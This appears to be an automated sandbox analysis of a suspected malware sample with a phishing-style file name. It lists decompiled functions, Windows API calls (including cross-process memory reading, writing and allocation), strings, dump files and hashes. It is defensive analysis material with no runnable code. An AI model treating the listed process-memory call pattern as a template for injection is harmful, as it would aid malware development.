                                                      Function 00FC4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0101DC50,?,0000000F,0000000C,00000016,0101DC50,?), ref: 00FC4645
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00FC46C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper$__itow__swprintf
                                                      • String ID: REMOVE$THIS
                                                      • API String ID: 3797816924-776492005
                                                      • Opcode ID: eef408488eb4d7f12047c4bfba2a321015a1ea3254ce72e667cb32a39c6b8ede
                                                      • Instruction ID: bf69ebbbe577cc5a89d009df39a46d18e1981290a463a9622ca3bcc72aca8489
                                                      • Opcode Fuzzy Hash: eef408488eb4d7f12047c4bfba2a321015a1ea3254ce72e667cb32a39c6b8ede
                                                      • Instruction Fuzzy Hash: 3C417F35A0020A9FCF05EFA4CD92EADB7B4BF49314F148059E916AB291D734EC41EB50
                                                      Function 00FBC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FC430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FBBC08,?,?,00000034,00000800,?,00000034), ref: 00FC4335
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FBC1D3
                                                        • Part of subcall function 00FC42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FBBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00FC4300
                                                        • Part of subcall function 00FC422F: GetWindowThreadProcessId.USER32(?,?), ref: 00FC425A
                                                        • Part of subcall function 00FC422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FBBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FC426A
                                                        • Part of subcall function 00FC422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FBBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FC4280
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FBC240
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FBC28D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: ca80c996f06f028615d64dfe545816074c4a1e9be61341025d7d53fd0c0bc321
                                                      • Instruction ID: 22fa3dfdf7cf686079d081066fc4cacac2cc2ad9d1d7f553aa63b10d505b6505
                                                      • Opcode Fuzzy Hash: ca80c996f06f028615d64dfe545816074c4a1e9be61341025d7d53fd0c0bc321
                                                      • Instruction Fuzzy Hash: 1C415C72900219AFDB11DFA4CD92FEEB7B8AF09710F004099FA45B7180DA756E45DBA1
                                                      Function 00FEA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0101DC00,00000000,?,?,?,?), ref: 00FEA6D8
                                                      • GetWindowLongW.USER32 ref: 00FEA6F5
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FEA705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 2cd5ee96e24ed1107ea6c44e41a60cf36decb164cff9fd208be50018ae9852c4
                                                      • Instruction ID: 924d44b66b3a709bd650e4ee0641636e39548205ede5b82a983ce6cf36875ef5
                                                      • Opcode Fuzzy Hash: 2cd5ee96e24ed1107ea6c44e41a60cf36decb164cff9fd208be50018ae9852c4
                                                      • Instruction Fuzzy Hash: 8531AE31500249ABDF218E79CC41BEA77A9EB49334F244725F8B5921E0C735E850AB50
                                                      Function 00FEA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FEA15E
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FEA172
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FEA196
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: d84f1704cf84e953953097183e3a72c7b5b0154e5cb1f90dd0adc400eae2f143
                                                      • Instruction ID: 96b388b0fb5df2a07ab044c26d38e0165b176ea9ba69b62724e48de16ca32e8d
                                                      • Opcode Fuzzy Hash: d84f1704cf84e953953097183e3a72c7b5b0154e5cb1f90dd0adc400eae2f143
                                                      • Instruction Fuzzy Hash: 9E21A332510218ABEF158F94CC82FEA3B79EF48764F110214FE556B1D0D6B9BC51DBA0
                                                      Function 00FEA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FEA941
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FEA94F
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FEA956
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: aa9c53df964f87d7e7f4b5fcc655a39cfd95ee86735bb8158690b4704e3c8b4d
                                                      • Instruction ID: 808b269609a942786b904513351520b8f67210bc8e0fc0b0868138f50ec22549
                                                      • Opcode Fuzzy Hash: aa9c53df964f87d7e7f4b5fcc655a39cfd95ee86735bb8158690b4704e3c8b4d
                                                      • Instruction Fuzzy Hash: CF21AEB5600209AFEB11DF69CCC1D7B37ADEF4A3A4B040059FA449B252CA35FC519B71
                                                      Function 00FE99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FE9A30
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FE9A40
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FE9A65
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 0362d709e17f182d781e380f97c8d8b33a94c9f2de3cc126be6701c64dcfa7d1
                                                      • Instruction ID: 1ca3be174dd02aa4e0423a044ea3c36e9d6c6e572b186a6de2ac49e623a47eff
                                                      • Opcode Fuzzy Hash: 0362d709e17f182d781e380f97c8d8b33a94c9f2de3cc126be6701c64dcfa7d1
                                                      • Instruction Fuzzy Hash: 4921F532A04118BFDF228F55CC85FBF3BAAEF89760F018129F9549B190C6B59C5197A0
                                                      Function 00FEA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FEA46D
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FEA482
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FEA48F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 67a7d361650dd23dcf3a2225678b74ed5a777e1612c5563b3d11dba9a22da806
                                                      • Instruction ID: 3e1091742f69358ce5a22721f33420f3f7c2ae7aa4ef1818f5a7f71b53155194
                                                      • Opcode Fuzzy Hash: 67a7d361650dd23dcf3a2225678b74ed5a777e1612c5563b3d11dba9a22da806
                                                      • Instruction Fuzzy Hash: DC110A71600248BEEF259F65CC45FAB376DEF88764F114118FA45960E1D2B6E811D720
                                                      Function 00FA2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FA2350,?), ref: 00FA22A1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FA22A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 2574300362-340411864
                                                      • Opcode ID: b5b4ed6075076840cdc78fe1b918dc261d24ff4f24a24105071a39aa6d2b32df
                                                      • Instruction ID: d77d58f6414809805f73c46ee8d73805a3c7e4b22f561a8a364eef70a1bc9f98
                                                      • Opcode Fuzzy Hash: b5b4ed6075076840cdc78fe1b918dc261d24ff4f24a24105071a39aa6d2b32df
                                                      • Instruction Fuzzy Hash: 00E012B4A90300ABFB715FF5DE89B543654A711711F004024B6C1E609CCBBE4040DF14
                                                      Function 00FA235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FA2276), ref: 00FA2376
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FA237D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 2574300362-2819208100
                                                      • Opcode ID: 92490cd7ac9f22a9d9bdc7f369653f80a7b938bc891754525368ee98e96e571b
                                                      • Instruction ID: 549791004942759cebe7cedae53c2d7d95e29d734b6801f33d4aa11fceaeaba2
                                                      • Opcode Fuzzy Hash: 92490cd7ac9f22a9d9bdc7f369653f80a7b938bc891754525368ee98e96e571b
                                                      • Instruction Fuzzy Hash: E5E0B6B8644300EBEB72AFE1EE5DB453A69B715716F100424F2C9E60ACCBBF94409B24
                                                      Function 00FFAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: c5dabe365e6ae34f51f96e1df1d152a195d9a70cda3f8746c699a149e7281591
                                                      • Instruction ID: 678b4cd48f51c06ed8777811d95a9b136bc38e20a36394cadbef88c0321a3237
                                                      • Opcode Fuzzy Hash: c5dabe365e6ae34f51f96e1df1d152a195d9a70cda3f8746c699a149e7281591
                                                      • Instruction Fuzzy Hash: 93E0ECF280461C9BCB519B90CD05AF9737CAB04741F500092BA4AA1024E639DB84BB22
                                                      Function 00F842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F842EC,?,00F842AA,?), ref: 00F84304
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F84316
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: d4e23bf49f08e41ca956d4a4f2318de324fa820f150d3408aba656c209747797
                                                      • Instruction ID: 0469f59d9ca976a2f19ec5c6d5995d295278aab82e4786b7a0281c08357ad451
                                                      • Opcode Fuzzy Hash: d4e23bf49f08e41ca956d4a4f2318de324fa820f150d3408aba656c209747797
                                                      • Instruction Fuzzy Hash: 2ED05E30800713AEC7216BA1A40868276D8AB04311F00481EA4C1D2114DB74D8809B60
                                                      Function 00FE2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FE21FB,?,00FE23EF), ref: 00FE2213
                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00FE2225
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetProcessId$kernel32.dll
                                                      • API String ID: 2574300362-399901964
                                                      • Opcode ID: 58c04769ea468d0cef83756ce8a059cda16654fd00cbd74cc1c94eb3a190d930
                                                      • Instruction ID: 64de3277f9b315c2da98b915305c70481fa8444429f0597f45bed335ac6c9354
                                                      • Opcode Fuzzy Hash: 58c04769ea468d0cef83756ce8a059cda16654fd00cbd74cc1c94eb3a190d930
                                                      • Instruction Fuzzy Hash: 3AD0A735C00712AFD7325FB2F40864176DCEB48311F00441DE8C1E2100EF75D8809770
                                                      Function 00F8434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00F841BB,00F84341,?,00F8422F,?,00F841BB,?,?,?,?,00F839FE,?,00000001), ref: 00F84359
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F8436B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: ea386e64d3ddcdde37da79f6628edc7fb3e7cc78b7efc71cc8f176fcae982b2d
                                                      • Instruction ID: 21f07e0b54047e1fc36e7d2bb9f4f15bb404a74b6d127a54f888da2a908fb154
                                                      • Opcode Fuzzy Hash: ea386e64d3ddcdde37da79f6628edc7fb3e7cc78b7efc71cc8f176fcae982b2d
                                                      • Instruction Fuzzy Hash: 48D0A730800713EFC7316FF2E40868176DCAB14725F00442EE4C1D2100DF74E8809770
                                                      Function 00FC0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00FC052F,?,00FC06D7), ref: 00FC0572
                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00FC0584
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                      • API String ID: 2574300362-1587604923
                                                      • Opcode ID: 6d937023644ad886ad081da5797b2589ceec5ec63216ce6e1c886178eda0b830
                                                      • Instruction ID: 9d3af3a25a9c9565811e2485d11b167f781d27a34b13b44fb382c95837d6e6cf
                                                      • Opcode Fuzzy Hash: 6d937023644ad886ad081da5797b2589ceec5ec63216ce6e1c886178eda0b830
                                                      • Instruction Fuzzy Hash: EDD09E70944712AFDB215FA5E419F42B7D8AB44711F14892DE8D592104DE74D4859B70
                                                      Function 00FC0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,00FC051D,?,00FC05FE), ref: 00FC0547
                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00FC0559
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                      • API String ID: 2574300362-1071820185
                                                      • Opcode ID: 3c8770ad78e03e702f264baf69beccb199ec19afc511fd4cfee5ca0c207fef55
                                                      • Instruction ID: 8d35694bbb1ca06f859130c60aae51725c639e7cbd6128d3a1d6263513649508
                                                      • Opcode Fuzzy Hash: 3c8770ad78e03e702f264baf69beccb199ec19afc511fd4cfee5ca0c207fef55
                                                      • Instruction Fuzzy Hash: C4D0A730804713EFC7308FA1E409B81B6D8AB04311F14C82DF4C6D2204DF75C8808B60
                                                      Function 00FDECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FDECBE,?,00FDEBBB), ref: 00FDECD6
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FDECE8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
